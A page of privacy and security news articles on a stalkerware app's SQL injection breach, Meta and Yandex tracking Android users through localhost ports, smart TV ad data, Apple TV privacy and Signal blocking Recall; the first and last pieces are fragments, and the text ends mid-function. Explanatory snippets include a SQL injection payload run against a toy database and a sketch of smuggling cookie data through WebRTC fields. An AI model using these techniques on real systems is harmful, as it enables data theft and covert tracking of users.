privacy

Provider of covert surveillance app spills passwords for 62,000 users

The maker of a phone app that is advertised as providing a stealthy means for monitoring all activities on an Android device spilled email addresses, plain-text passwords, and other sensitive data belonging to 62,000 users, a researcher discovered recently.

A security flaw in the app, branded Catwatchful, allowed researcher Eric Daigle to download a trove of sensitive data, which belonged to account holders who used the covert app to monitor phones. The leak, made possible by a SQL injection vulnerability, allowed anyone who exploited it to access the accounts and all data stored in them.
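
Neither the researcher nor the report includes Catwatchful’s actual server code, so the sketch below is a hypothetical illustration of the bug class. It shows how a query built by string concatenation lets crafted input rewrite the SQL, while a parameterized query treats the same input as inert data:

```python
import sqlite3

# Hypothetical illustration of a SQL injection flaw; the real Catwatchful
# code isn't public. A toy database with one user:
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (email TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('a@b.com', 'hunter2')")

attacker_input = "' OR '1'='1"

# Vulnerable: the attacker's quote breaks out of the string literal, and
# the OR clause matches every row.
rows = conn.execute(
    f"SELECT email, password FROM users WHERE email = '{attacker_input}'"
).fetchall()
print("injected query returns:", rows)  # every account in the table

# Safe: placeholder binding keeps the input as data; nothing matches.
rows = conn.execute(
    "SELECT email, password FROM users WHERE email = ?", (attacker_input,)
).fetchall()
print("parameterized query returns:", rows)  # []
```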

Unstoppable

Catwatchful creators emphasize the app’s stealth and security. While the promoters claim the app is legal and intended for parents monitoring their children’s online activities, the emphasis on stealth has raised concerns that it’s being aimed at people with other agendas.

“Catwatchful is invisible,” a page promoting the app says. “It cannot be detected. It cannot be uninstalled. It cannot be stopped. It cannot be closed. Only you can access the information it collects.”

The promoters go on to say users “can monitor a phone without [owners] knowing with mobile phone monitoring software. The app is invisible and undetectable on the phone. It works in a hidden and stealth mode.”

Smart TV OS owners face “constant conflict” between privacy, advertiser demands

DENVER—Most smart TV operating system (OS) owners are in the ad sales business now. Software providers for budget and premium TVs are honing their ad skills, which requires advancing their ability to collect user data. This is creating an “inherent conflict” within the industry, Takashi Nakano, VP of content and programming at Samsung TV Plus, said at the StreamTV Show in Denver last week.

During a panel at StreamTV Insider’s conference entitled “CTV OS Leader Roundtable: From Drivers to Engagement and Content Strategy,” Nakano acknowledged the opposing needs of advertisers and smart TV users, who are calling for a reasonable amount of data privacy.

“Do you want your data sold out there and everyone to know exactly what you’ve been watching … the answer is generally no,” the Samsung executive said. “Yet, advertisers want all of this data. They wanna know exactly what you ate for breakfast.”

Nakano also suggested that the owners of OSes targeting smart TVs and other streaming hardware, like streaming sticks, are inundated with user data that may not actually be that useful or imperative to collect:

I think that there’s inherent conflict in the ad ecosystem supplying so much data. … We’re fortunate to have all that data, but we’re also like, ‘Do we really want to give it all, and hand it all out?’ There’s a constant conflict around that, right? So how do we create an ecosystem where we can serve ads that are pretty good? Maybe it’s not perfect …

Today, connected TV (CTV) OSes are largely built around not just gathering user data, but also creating ways to collect new types of information about viewers in order to deliver more relevant, impactful ads. LG, for example, recently announced that its smart TV OS, webOS, will use a new AI model that informs ad placement based on viewers’ emotions and personal beliefs.

Meta and Yandex are de-anonymizing Android users’ web browsing identifiers


Abuse allows Meta and Yandex to attach persistent identifiers to detailed browsing histories.

Credit: Aurich Lawson | Getty Images

Tracking code that Meta and Russia-based Yandex embed into millions of websites is de-anonymizing visitors by abusing legitimate Internet protocols, causing Chrome and other browsers to surreptitiously send unique identifiers to native apps installed on a device, researchers have discovered. Google says it’s investigating the abuse, which allows Meta and Yandex to convert ephemeral web identifiers into persistent mobile app user identities.

The covert tracking—implemented in the Meta Pixel and Yandex Metrica trackers—allows Meta and Yandex to bypass core security and privacy protections provided by both the Android operating system and browsers that run on it. Android sandboxing, for instance, isolates processes to prevent them from interacting with the OS and any other app installed on the device, cutting off access to sensitive data or privileged system resources. Defenses such as state partitioning and storage partitioning, which are built into all major browsers, store site cookies and other data associated with a website in containers that are unique to every top-level website domain to ensure they’re off-limits for every other site.

A blatant violation

“One of the fundamental security principles that exists in the web, as well as the mobile system, is called sandboxing,” Narseo Vallina-Rodriguez, one of the researchers behind the discovery, said in an interview. “You run everything in a sandbox, and there is no interaction within different elements running on it. What this attack vector allows is to break the sandbox that exists between the mobile context and the web context. The channel that exists allowed the Android system to communicate what happens in the browser with the identity running in the mobile app.”

The bypass—which Yandex began in 2017 and Meta started last September—allows the companies to pass cookies or other identifiers from Firefox and Chromium-based browsers to native Android apps for Facebook, Instagram, and various Yandex apps. The companies can then tie that vast browsing history to the account holder logged into the app.

This abuse has been observed only in Android, and evidence suggests that the Meta Pixel and Yandex Metrica target only Android users. The researchers say it may be technically feasible to target iOS because browsers on that platform allow developers to programmatically establish localhost connections that apps can monitor on local ports.

In contrast to iOS, however, Android imposes fewer controls on localhost communications and the background execution of mobile apps, the researchers said, and its app store vetting process does less to limit such abuses. This overly permissive design allows Meta Pixel and Yandex Metrica to send web requests carrying web tracking identifiers to specific local ports that are continuously monitored by the Facebook, Instagram, and Yandex apps. These apps can then link pseudonymous web identities with actual user identities, even in private browsing modes, effectively de-anonymizing users’ browsing habits on sites containing these trackers.

Meta Pixel and Yandex Metrica are analytics scripts designed to help advertisers measure the effectiveness of their campaigns. Meta Pixel and Yandex Metrica are estimated to be installed on 5.8 million and 3 million sites, respectively.

Meta and Yandex achieve the bypass by abusing basic functionality built into modern mobile browsers that allows browser-to-native app communications. The functionality lets browsers send web requests to local Android ports to establish various services, including media connections through the RTC protocol, file sharing, and developer debugging.

A conceptual diagram representing the exchange of identifiers between the web trackers running on the browser context and native Facebook, Instagram, and Yandex apps for Android.

While the technical underpinnings differ, both Meta Pixel and Yandex Metrica perform what the researchers call a “weird protocol misuse” to exploit the unvetted access Android provides to localhost ports on the 127.0.0.1 IP address. Browsers access these ports without user notification. Facebook, Instagram, and Yandex native apps silently listen on those ports, copy identifiers in real time, and link them to the user logged into the app.
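
The researchers haven’t published the apps’ listener code, but the mechanics are simple enough to sketch. In the self-contained Python toy below, a thread stands in for a native app’s background service bound to a loopback port, and a plain HTTP request stands in for the tracker script running in a web page; the port number is one the researchers observed, while everything else is illustrative:

```python
import socket
import threading
import time
import urllib.request

PORT = 12387  # one of the TCP ports the researchers saw Meta's apps monitoring

def app_side_listener():
    # Stand-in for a native app's background service: silently read whatever
    # a browser-resident script sends to the loopback port.
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", PORT))
    srv.listen(1)
    conn, _ = srv.accept()
    request = conn.recv(4096).decode(errors="replace")
    print("app side captured:", request.splitlines()[0])  # GET /?fbp=... HTTP/1.1
    conn.close()
    srv.close()

threading.Thread(target=app_side_listener, daemon=True).start()
time.sleep(0.2)  # let the listener bind before the "browser" connects

# Stand-in for the tracker script in a web page: a request to 127.0.0.1
# triggers no permission prompt or user notification.
try:
    urllib.request.urlopen(f"http://127.0.0.1:{PORT}/?fbp=fb.1.1234.5678", timeout=2)
except Exception:
    pass  # the toy listener never answers; the identifier has already leaked
```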

A representative for Google said the behavior violates the terms of service for its Play marketplace and the privacy expectations of Android users.

“The developers in this report are using capabilities present in many browsers across iOS and Android in unintended ways that blatantly violate our security and privacy principles,” the representative said, referring to the people who write the Meta Pixel and Yandex Metrica JavaScript. “We’ve already implemented changes to mitigate these invasive techniques and have opened our own investigation and are directly in touch with the parties.”

Meta didn’t answer emailed questions for this article, but provided the following statement: “We are in discussions with Google to address a potential miscommunication regarding the application of their policies. Upon becoming aware of the concerns, we decided to pause the feature while we work with Google to resolve the issue.”

Yandex representatives didn’t answer an email seeking comment.

How Meta and Yandex de-anonymize Android users

Meta Pixel developers have abused various protocols to implement the covert listening since the practice began last September. They started by causing browsers to send HTTP requests to port 12387. A month later, Meta Pixel stopped sending this data, even though Facebook and Instagram apps continued to monitor the port.

In November, Meta Pixel switched to a new method that invoked WebSocket, a protocol for two-way communications, over port 12387.

That same month, Meta Pixel also deployed a new method that used WebRTC, a real-time peer-to-peer communication protocol commonly used for making audio or video calls in the browser. This method used a complicated process known as SDP munging, a technique for JavaScript code to modify Session Description Protocol data before it’s sent. Still in use today, the SDP munging by Meta Pixel inserts key _fbp cookie content into fields meant for connection information. This causes the browser to send that data as part of a STUN request to the Android local host, where the Facebook or Instagram app can read it and link it to the user.
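
The article doesn’t spell out exactly which SDP fields Meta’s JavaScript rewrites, so the following is only a conceptual sketch of SDP munging: identifier bytes are smuggled into the ICE username fragment, a field that is later echoed inside the STUN messages sent toward the local ports. In a real page, this rewrite happens in JavaScript between createOffer() and setLocalDescription(); the Python below just shows the string surgery:

```python
import re

def munge_sdp(sdp: str, fbp_cookie: str) -> str:
    # Replace the ICE username fragment (a=ice-ufrag) with cookie-derived
    # content. The ufrag is carried in the USERNAME attribute of subsequent
    # STUN binding requests, so a listener on 127.0.0.1 can read it back out.
    smuggled = fbp_cookie.replace(".", "")[:16]
    return re.sub(r"a=ice-ufrag:\S+", f"a=ice-ufrag:{smuggled}", sdp)

offer = "v=0\r\na=ice-ufrag:F7gI\r\na=ice-pwd:secretpwd1234567890\r\n"
print(munge_sdp(offer, "fb.1.1596403881668.1116446470"))
```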

In May, a beta version of Chrome introduced a mitigation that blocked the type of SDP munging that Meta Pixel used. Within days, Meta Pixel circumvented the mitigation by adding a new method that swapped STUN requests for TURN requests.

In a post, the researchers provided a detailed description of how the _fbp cookie travels from a website to the native app and, from there, to the Meta server:

1. The user opens the native Facebook or Instagram app, which eventually is sent to the background and creates a background service to listen for incoming traffic on a TCP port (12387 or 12388) and a UDP port (the first unoccupied port in 12580–12585). Users must be logged in with their credentials on the apps.

2. The user opens their browser and visits a website integrating the Meta Pixel.

3. At this stage, some websites wait for users’ consent before embedding Meta Pixel. In our measurements of the top 100K website homepages, we found websites that require consent to be a minority (more than 75% of affected sites do not require user consent)…

4. The Meta Pixel script is loaded and the _fbp cookie is sent to the native Instagram or Facebook app via WebRTC (STUN) SDP Munging.

5. The Meta Pixel script also sends the _fbp value in a request to https://www.facebook.com/tr along with other parameters such as page URL (dl), website and browser metadata, and the event type (ev) (e.g., PageView, AddToCart, Donate, Purchase).

6. The Facebook or Instagram apps receive the _fbp cookie from the Meta JavaScripts running on the browser and transmit it to the GraphQL endpoint (https://graph[.]facebook[.]com/graphql) along with other persistent user identifiers, linking users’ fbp ID (web visit) with their Facebook or Instagram account.

Detailed flow of the way the Meta Pixel leaks the _fbp cookie from Android browsers to its Facebook and Instagram apps.

The first known instance of Yandex Metrica linking websites visited in Android browsers to app identities was in May 2017, when the tracker started sending HTTP requests to local ports 29009 and 30102. In May 2018, Yandex Metrica also began sending the data through HTTPS to ports 29010 and 30103. Both methods remained in place as of publication time.

An overview of Yandex identifier sharing

A timeline of web history tracking by Meta and Yandex

Some browsers for Android have blocked the abusive JavaScript in trackers. DuckDuckGo, for instance, was already blocking domains and IP addresses associated with the trackers, preventing the browser from sending any identifiers to Meta. The browser also blocked most of the domains associated with Yandex Metrica. After the researchers notified DuckDuckGo of the incomplete blacklist, developers added the missing addresses.

The Brave browser, meanwhile, also blocked the sharing of identifiers due to its extensive blocklists and existing mitigation to block requests to the localhost without explicit user consent. Vivaldi, another Chromium-based browser, forwards the identifiers to local Android ports when the default privacy setting is in place. Changing the setting to block trackers appears to thwart browsing history leakage, the researchers said.

Tracking blocker settings in Vivaldi for Android.

There’s got to be a better way

The various remedies DuckDuckGo, Brave, Vivaldi, and Chrome have put in place are working as intended, but the researchers caution they could become ineffective at any time.

“Any browser doing blocklisting will likely enter into a constant arms race, and it’s just a partial solution,” Vallina-Rodriguez said of the current mitigations. “Creating effective blocklists is hard, and browser makers will need to constantly monitor the use of this type of capability to detect other hostnames potentially abusing localhost channels and then updating their blocklists accordingly.”

He continued:

While this solution works once you know the hostnames doing that, it’s not the right way of mitigating this issue, as trackers may find ways of accessing this capability (e.g., through more ephemeral hostnames). A long-term solution should go through the design and development of privacy and security controls for localhost channels, so that users can be aware of this type of communication and potentially enforce some control or limit this use (e.g., a permission or some similar user notifications).

Chrome and most other Chromium-based browsers executed the JavaScript as Meta and Yandex intended. Firefox did as well, although for reasons that aren’t clear, the browser was not able to successfully perform the SDP munging specified in later versions of the code. After blocking the STUN variant of SDP munging in the early May beta release, a production version of Chrome released two weeks ago began blocking both the STUN and TURN variants. Other Chromium-based browsers are likely to implement the blocks in the coming weeks. A representative for Firefox-maker Mozilla said the organization prioritizes user privacy and is taking the report seriously.

“We are actively investigating the reported behavior, and working to fully understand its technical details and implications,” Mozilla said in an email. “Based on what we’ve seen so far, we consider these to be severe violations of our anti-tracking policies, and are assessing solutions to protect against these new tracking techniques.”

The researchers warn that the current fixes are so specific to the code in the Meta and Yandex trackers that it would be easy to bypass them with a simple update.

“They know that if someone else comes in and tries a different port number, they may bypass this protection,” said Gunes Acar, the researcher behind the initial discovery, referring to the Chrome developer team at Google. “But our understanding is they want to send this message that they will not tolerate this form of abuse.”

Fellow researcher Vallina-Rodriguez said the more comprehensive way to prevent the abuse is for Android to overhaul the way it handles access to local ports.

“The fundamental issue is that the access to the local host sockets is completely uncontrolled on Android,” he explained. “There’s no way for users to prevent this kind of communication on their devices. Because of the dynamic nature of JavaScript code and the difficulty to keep blocklists up to date, the right way of blocking this persistently is by limiting this type of access at the mobile platform and browser level, including stricter platform policies to limit abuse.”

Got consent?

The researchers who made this discovery are:

  • Aniketh Girish, PhD student at IMDEA Networks
  • Gunes Acar, assistant professor in Radboud University’s Digital Security Group & iHub
  • Narseo Vallina-Rodriguez, associate professor at IMDEA Networks
  • Nipuna Weerasekara, PhD student at IMDEA Networks
  • Tim Vlummens, PhD student at COSIC, KU Leuven

Acar said he first noticed Meta Pixel accessing local ports while visiting his own university’s website.

There’s no indication that Meta or Yandex has disclosed the tracking to either websites hosting the trackers or end users who visit those sites. Developer forums show that many websites using Meta Pixel were caught off guard when the scripts began connecting to local ports.

“Since 5th September, our internal JS error tracking has been flagging failed fetch requests to localhost: 12387,” one developer wrote. “No changes have been made on our side, and the existing Facebook tracking pixel we use loads via Google Tag Manager.”

“Is there some way I can disable this?” another developer encountering the unexplained local port access asked.

It’s unclear whether browser-to-native-app tracking violates any privacy laws in various countries. Both Meta and companies hosting its Meta Pixel, however, have faced a raft of lawsuits in recent years alleging that the data collected violates privacy statutes. A research paper from 2023 found that Meta Pixel, then called the Facebook Pixel, “tracks a wide range of user activities on websites with alarming detail, especially on websites classified as sensitive categories under GDPR,” the abbreviation for the European Union’s General Data Protection Regulation.

So far, Google has provided no indication that it plans to redesign the way Android handles local port access. For now, the most comprehensive protection against Meta Pixel and Yandex Metrica tracking is to refrain from installing the Facebook, Instagram, or Yandex apps on Android devices.

Dan Goodin is Senior Security Editor at Ars Technica, where he oversees coverage of malware, computer espionage, botnets, hardware hacking, encryption, and passwords. In his spare time, he enjoys gardening, cooking, and following the independent music scene. Dan is based in San Francisco. Follow him on Mastodon and Bluesky. Contact him on Signal at DanArs.82.

Breaking down why Apple TVs are privacy advocates’ go-to streaming device


Using the Apple TV app or an Apple account means giving Apple more data, though.

Credit: Aurich Lawson | Getty Images

Every time I write an article about the escalating advertising and tracking on today’s TVs, someone brings up Apple TV boxes. Among smart TVs, streaming sticks, and other streaming devices, Apple TVs are largely viewed as a safe haven.

“Just disconnect your TV from the Internet and use an Apple TV box.”

That’s the common guidance you’ll hear from Ars readers for those seeking the joys of streaming without giving up too much privacy. Based on our research and the experts we’ve consulted, that advice is pretty solid, as Apple TVs offer significantly more privacy than other streaming hardware providers.

But how private are Apple TV boxes, really? Apple TVs don’t use automatic content recognition (ACR, a user-tracking technology leveraged by nearly all smart TVs and streaming devices), but could that change? And what about the software that Apple TV users do use—could those apps provide information about you to advertisers or Apple?

In this article, we’ll delve into what makes the Apple TV’s privacy stand out and examine whether users should expect the limited ads and enhanced privacy to last forever.

Apple TV boxes limit tracking out of the box

One of the simplest ways Apple TVs ensure better privacy is through their setup process, during which you can disable Siri, location tracking, and sending analytics data to Apple. During setup, users also receive several opportunities to review Apple’s data and privacy policies. Also off by default is the boxes’ ability to send voice input data to Apple.

Most other streaming devices require users to navigate through pages of settings to disable similar tracking capabilities, which most people are unlikely to do. Apple’s approach creates a line of defense against snooping, even for those unaware of how invasive smart devices can be.

Apple TVs running tvOS 14.5 and later also make third-party app tracking more difficult by requiring such apps to request permission before they can track users.

“If you choose Ask App Not to Track, the app developer can’t access the system advertising identifier (IDFA), which is often used to track,” Apple says. “The app is also not permitted to track your activity using other information that identifies you or your device, like your email address.”

Users can access the Apple TV settings and disable the ability of third-party apps to ask permission for tracking. However, Apple could further enhance privacy by enabling this setting by default.

The Apple TV also lets users control which apps can access the set-top box’s Bluetooth functionality, photos, music, and HomeKit data (if applicable), and the remote’s microphone.

“Apple’s primary business model isn’t dependent on selling targeted ads, so it has somewhat less incentive to harvest and monetize incredible amounts of your data,” said RJ Cross, director of the consumer privacy program at the Public Interest Research Group (PIRG). “I personally trust them more with my data than other tech companies.”

What if you share analytics data?

If you allow your Apple TV to share analytics data with Apple or app developers, that data won’t be personally identifiable, Apple says. Any collected personal data is “not logged at all, removed from reports before they’re sent to Apple, or protected by techniques, such as differential privacy,” Apple says.

Differential privacy, which injects noise into collected data, is one of the most common methods used for anonymizing data. In support documentation (PDF), Apple details its use of differential privacy:

The first step we take is to privatize the information using local differential privacy on the user’s device. The purpose of privatization is to assure that Apple’s servers don’t receive clear data. Device identifiers are removed from the data, and it is transmitted to Apple over an encrypted channel. The Apple analysis system ingests the differentially private contributions, dropping IP addresses and other metadata. The final stage is aggregation, where the privatized records are processed to compute the relevant statistics, and the aggregate statistics are then shared with relevant Apple teams. Both the ingestion and aggregation stages are performed in a restricted access environment so even the privatized data isn’t broadly accessible to Apple employees.
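
Apple’s document doesn’t disclose its exact mechanism, but a minimal sketch of local differential privacy, here using classic randomized response for a single yes/no statistic, shows the idea: each device randomizes its own answer before anything leaves the device, yet the aggregate rate remains estimable:

```python
import math
import random

def randomized_response(truth: bool, epsilon: float) -> bool:
    # Keep the true answer with probability e^eps / (e^eps + 1); otherwise
    # report the opposite. A smaller epsilon means more noise per device.
    p_truth = math.exp(epsilon) / (math.exp(epsilon) + 1)
    return truth if random.random() < p_truth else not truth

def estimate_rate(reports: list[bool], epsilon: float) -> float:
    # Invert the known noise to recover an unbiased population estimate.
    p = math.exp(epsilon) / (math.exp(epsilon) + 1)
    observed = sum(reports) / len(reports)
    return (observed + p - 1) / (2 * p - 1)

# 10,000 simulated devices, 30% of which truly used some feature:
reports = [randomized_response(random.random() < 0.30, epsilon=1.0)
           for _ in range(10_000)]
print(estimate_rate(reports, epsilon=1.0))  # ~0.30, without trusting any device
```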

What if you use an Apple account with your Apple TV?

Another factor to consider is Apple’s privacy policy regarding Apple accounts, formerly Apple IDs.

Apple support documentation says you “need” an Apple account to use an Apple TV, but you can use the hardware without one. Still, it’s common for people to log into Apple accounts on their Apple TV boxes because it makes it easier to link with other Apple products. Another reason someone might link an Apple TV box with an Apple account is to use the Apple TV app, a common way to stream on Apple TV boxes.

So what type of data does Apple harvest from Apple accounts? According to its privacy policy, the company gathers usage data, such as “data about your activity on and use of” Apple offerings, including “app launches within our services…; browsing history; search history; [and] product interaction.”

Other types of data Apple may collect from Apple accounts include transaction information (Apple says this is “data about purchases of Apple products and services or transactions facilitated by Apple, including purchases on Apple platforms”), account information (“including email address, devices registered, account status, and age”), device information (including serial number and browser type), contact information (including physical address and phone number), and payment information (including bank details). None of that is surprising considering the type of data needed to make an Apple account work.

Many Apple TV users can expect Apple to gather more data from their Apple account usage on other devices, such as iPhones or Macs. If you use the same Apple account across multiple devices, Apple can tie the data it has collected from, for example, your iPhone activity to you as an Apple TV user.

A potential workaround could be maintaining multiple Apple accounts. With an Apple account solely dedicated to your Apple TV box and Apple TV hardware and software tracking disabled as much as possible, Apple would have minimal data to ascribe to you as an Apple TV owner. You can also use your Apple TV box without an Apple account, but then you won’t be able to use the Apple TV app, one of the device’s key features.

Data collection via the Apple TV app

You can download third-party apps like Netflix and Hulu onto an Apple TV box, but most TV and movie watching on Apple TV boxes likely occurs via the Apple TV app. The app is necessary for watching content on the Apple TV+ streaming service, but it also drives usage by providing access to the libraries of many (but not all) popular streaming apps in one location. So understanding the Apple TV app’s privacy policy is critical to evaluating how private Apple TV activity truly is.

As expected, some of the data the app gathers is necessary for the software to work. That includes, according to the app’s privacy policy, “information about your purchases, downloads, activity in the Apple TV app, the content you watch, and where you watch it in the Apple TV app and in connected apps on any of your supported devices.” That all makes sense for ensuring that the app remembers things like which episode of Severance you’re on across devices.

Apple collects other data, though, that isn’t necessary for functionality. It says it gathers data on things like the “features you use (for example, Continue Watching or Library),” content pages you view, how you interact with notifications, and approximate location information (that Apple says doesn’t identify users) to help improve the app.

Additionally, Apple tracks the terms you search for within the app, per its policy:

We use Apple TV search data to improve models that power Apple TV. For example, aggregate Apple TV search queries are used to fine-tune the Apple TV search model.

This data usage is less intrusive than that of other streaming devices, which might track your activity and then sell that data to third-party advertisers. But some people may be hesitant about having any of their activities tracked to benefit a multi-trillion-dollar conglomerate.

Data collected from the Apple TV app used for ads

By default, the Apple TV app also tracks “what you watch, your purchases, subscriptions, downloads, browsing, and other activities in the Apple TV app” to make personalized content recommendations. Content recommendations aren’t ads in the traditional sense but instead provide a way for Apple to push you toward products by analyzing data it has on you.

You can disable the Apple TV app’s personalized recommendations, but it’s a little harder than you might expect since you can’t do it through the app. Instead, you need to go to the Apple TV settings and then select Apps > TV > Use Play History > Off.

The most privacy-conscious users may wish that personalized recommendations were off by default. Darío Maestro, senior legal fellow at the nonprofit Surveillance Technology Oversight Project (STOP), noted to Ars that even though Apple TV users can opt out of personalized content recommendations, “many will not realize they can.”

Apple can also use data it gathers on you from the Apple TV app to serve traditional ads. If you allow your Apple TV box to track your location, the Apple TV app can also track your location. That data can “be used to serve geographically relevant ads,” according to the Apple TV app privacy policy. Location tracking, however, is off by default on Apple TV boxes.

Apple’s tvOS doesn’t have integrated ads. For comparison, some TV OSes, like Roku OS and LG’s webOS, show ads on the OS’s home screen and/or when showing screensavers.

But data gathered from the Apple TV app can still help Apple’s advertising efforts. This can happen if you allow personalized ads in other Apple apps that serve targeted ads, such as Apple News, the App Store, or Stocks. In such cases, Apple may apply data gathered from the Apple TV app, “including information about the movies and TV shows you purchase from Apple, to serve ads in those apps that are more relevant to you,” the Apple TV app privacy policy says.

Apple also provides third-party advertisers and strategic partners with “non-personal data” gathered from the Apple TV app:

We provide some non-personal data to our advertisers and strategic partners that work with Apple to provide our products and services, help Apple market to customers, and sell ads on Apple’s behalf to display on the App Store and Apple News and Stocks.

Apple also shares non-personal data from the Apple TV with third parties, such as content owners, so they can pay royalties, gauge how much people are watching their shows or movies, “and improve their associated products and services,” Apple says.

Apple’s policy notes:

For example, we may share non-personal data about your transactions, viewing activity, and region, as well as aggregated user demographics[,] such as age group and gender (which may be inferred from information such as your name and salutation in your Apple Account), to Apple TV strategic partners, such as content owners, so that they can measure the performance of their creative work [and] meet royalty and accounting requirements.

When reached for comment, an Apple spokesperson told Ars that Apple TV users can clear their play history from the app.

All that said, the Apple TV app still shares far less data with third parties than other streaming apps. Netflix, for example, says it discloses some personal information to advertising companies “in order to select Advertisements shown on Netflix, to facilitate interaction with Advertisements, and to measure and improve effectiveness of Advertisements.”

Warner Bros. Discovery says it discloses information about Max viewers “with advertisers, ad agencies, ad networks and platforms, and other companies to provide advertising to you based on your interests.” And Disney+ users have Nielsen tracking on by default.

What if you use Siri?

You can easily deactivate Siri when setting up an Apple TV. But those who opt to keep the voice assistant and the ability to control Apple TV with their voice take somewhat of a privacy hit.

According to the privacy policy accessible in Apple TV boxes’ settings, Apple boxes automatically send all Siri requests to Apple’s servers. If you opt into using Siri data to “Improve Siri and Dictation,” Apple will store your audio data. If you opt out, audio data won’t be stored, but per the policy:

In all cases, transcripts of your interactions will be sent to Apple to process your requests and may be stored by Apple.

Apple TV boxes also send audio and transcriptions of dictation input to Apple servers for processing. Apple says it doesn’t store the audio but may store transcriptions of the audio.

If you opt to “Improve Siri and Dictation,” Apple says your history of voice requests isn’t tied to your Apple account or email. But Apple is vague about how long it may store data related to voice input performed with the Apple TV if you choose this option.

The policy states:

Your request history, which includes transcripts and any related request data, is associated with a random identifier for up to six months and is not tied to your Apple Account or email address. After six months, your request history is disassociated from the random identifier and may be retained for up to two years. Apple may use this data to develop and improve Siri, Dictation, Search, and limited other language processing functionality in Apple products …

Apple may also review a subset of the transcripts of your interactions and this … may be kept beyond two years for the ongoing improvements of products and services.

Apple promises not to use Siri and voice data to build marketing profiles or sell them to third parties, but it hasn’t always adhered to that commitment. In January, Apple agreed to pay $95 million to settle a class-action lawsuit accusing Siri of recording private conversations and sharing them with third parties for targeted ads. In 2019, contractors reported hearing private conversations and recorded sex via Siri-gathered audio.

Outside of Apple, we’ve seen voice request data used questionably, including in criminal trials and by corporate employees. Siri and dictation data also represent additional ways a person’s Apple TV usage might be unexpectedly analyzed to fuel Apple’s business.

Automatic content recognition

Apple TVs aren’t preloaded with automatic content recognition (ACR), an Apple spokesperson confirmed to Ars, another plus for privacy advocates. But ACR is software, so Apple could technically add it to Apple TV boxes via a software update at some point.

Sherman Li, the founder of Enswers, the company that first put ACR in Samsung TVs, confirmed to Ars that it’s technically possible for Apple to add ACR to already-purchased Apple boxes. Years ago, Enswers retroactively added ACR to other types of streaming hardware, including Samsung and LG smart TVs. (Enswers was acquired by Gracenote, which Nielsen now owns.)

In general, though, there are challenges to adding ACR to hardware that people already own, Li explained:

Everyone believes, in theory, you can add ACR anywhere you want at any time because it’s software, but because of the way [hardware is] architected… the interplay between the chipsets, like the SoCs, and the firmware is different in a lot of situations.

Li pointed to numerous variables that could prevent ACR from being retroactively added to any type of streaming hardware, “including access to video frame buffers, audio streams, networking connectivity, security protocols, OSes, and app interface communication layers, especially at different levels of the stack in these devices, depending on the implementation.”

Due to the complexity of Apple TV boxes, Li suspects it would be difficult to add ACR to already-purchased Apple TVs. It would likely be simpler for Apple to release a new box with ACR if it ever decided to go down that route.

If Apple were to add ACR to old or new Apple TV boxes, the devices would be far less private, and the move would be highly unpopular and eliminate one of the Apple TV’s biggest draws.

However, Apple reportedly has a growing interest in advertising to streaming subscribers. The Apple TV+ streaming service doesn’t currently show commercials, but the company is rumored to be exploring a potential ad tier. The suspicions stem from a reported meeting between Apple and the United Kingdom’s ratings body, Barb, to discuss how it might track ads on Apple TV+, according to a July report from The Telegraph.

Since 2023, Apple has also hired several prominent names in advertising, including a former head of advertising at NBCUniversal and a new head of video ad sales. Further, Apple TV+ is one of the few streaming services to remain ad-free, and it’s reported to be losing Apple $1 billion per year since its launch.

One day soon, Apple may have much more reason to care about advertising in streaming and being able to track the activities of people who use its streaming offerings. That has implications for Apple TV box users.

“The more Apple creeps into the targeted ads space, the less I’ll trust them to uphold their privacy promises. You can imagine Apple TV being a natural progression for selling ads,” PIRG’s Cross said.

Somewhat ironically, Apple has marketed its approach to privacy as a positive for advertisers.

“Apple’s commitment to privacy and personal relevancy builds trust amongst readers, driving a willingness to engage with content and ads alike,” Apple’s advertising guide for buying ads on Apple News and Stocks reads.

The most private streaming gadget

It remains technologically possible for Apple to introduce intrusive tracking or ads to Apple TV boxes, but for now, the streaming devices are more private than the vast majority of alternatives, save for dumb TVs (which are incredibly hard to find these days). And if Apple follows its own policies, much of the data it gathers should be kept in-house.

However, those with strong privacy concerns should be aware that Apple does track certain tvOS activities, especially those that happen through Apple accounts, voice interaction, or the Apple TV app. And while most of Apple’s streaming hardware and software settings prioritize privacy by default, some advocates believe there’s room for improvement.

For example, STOP’s Maestro said:

Unlike in the [European Union], where the upcoming Data Act will set clearer rules on transfers of data generated by smart devices, the US has no real legislation governing what happens with your data once it reaches Apple’s servers. Users are left with little way to verify those privacy promises.

Maestro suggested that Apple could address these concerns by making it easier for people to conduct security research on smart device software. “Allowing the development of alternative or modified software that can evaluate privacy settings could also increase user trust and better uphold Apple’s public commitment to privacy,” Maestro said.

There are ways to limit the amount of data that advertisers can get from your Apple TV. But if you use the Apple TV app, Apple can use your activity to help make business decisions—and therefore money.

As you might expect from a device that connects to the Internet and lets you stream shows and movies, Apple TV boxes aren’t totally incapable of tracking you. But they’re still the best recommendation for streaming users seeking hardware with more privacy and fewer ads.

Scharon is a Senior Technology Reporter at Ars Technica writing news, reviews, and analysis on consumer gadgets and services. She’s been reporting on technology for over 10 years, with bylines at Tom’s Hardware, Channelnomics, and CRN UK.

“Microsoft has simply given us no other option,” Signal says as it blocks Windows Recall

But the changes go only so far in limiting the risks Recall poses. As I pointed out, when Recall is turned on, it indexes Zoom meetings, emails, photos, medical conditions, and—yes—Signal conversations, not just with the user, but anyone interacting with that user, without their knowledge or consent.

Researcher Kevin Beaumont performed his own deep-dive analysis that also found that some of the new controls were lacking. For instance, Recall continued to screenshot his payment card details. It also decrypted the database with a simple fingerprint scan or PIN. And it’s unclear whether the type of sophisticated malware that routinely infects consumer and enterprise Windows users will be able to decrypt encrypted database contents.

And as Cunningham also noted, Beaumont found that Microsoft still provided no means for developers to prevent content displayed in their apps from being indexed. That left Signal developers at a disadvantage, so they had to get creative.

With no API for blocking Recall in the Windows Desktop version, Signal is instead invoking an API Microsoft provides for protecting copyrighted material. App developers can turn on the DRM setting to prevent Windows from taking screenshots of copyrighted content displayed in the app. Signal is now repurposing the API to add an extra layer of privacy.
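
Signal’s change lives in its Electron-based desktop client, where this kind of protection is typically enabled with win.setContentProtection(true); on Windows, that maps to the Win32 call sketched below. This is a hedged illustration rather than Signal’s actual code: a window marked WDA_EXCLUDEFROMCAPTURE renders as black in screen captures, including Recall’s snapshots:

```python
import ctypes

WDA_EXCLUDEFROMCAPTURE = 0x00000011  # available on Windows 10 2004 and later

def exclude_from_capture(hwnd: int) -> bool:
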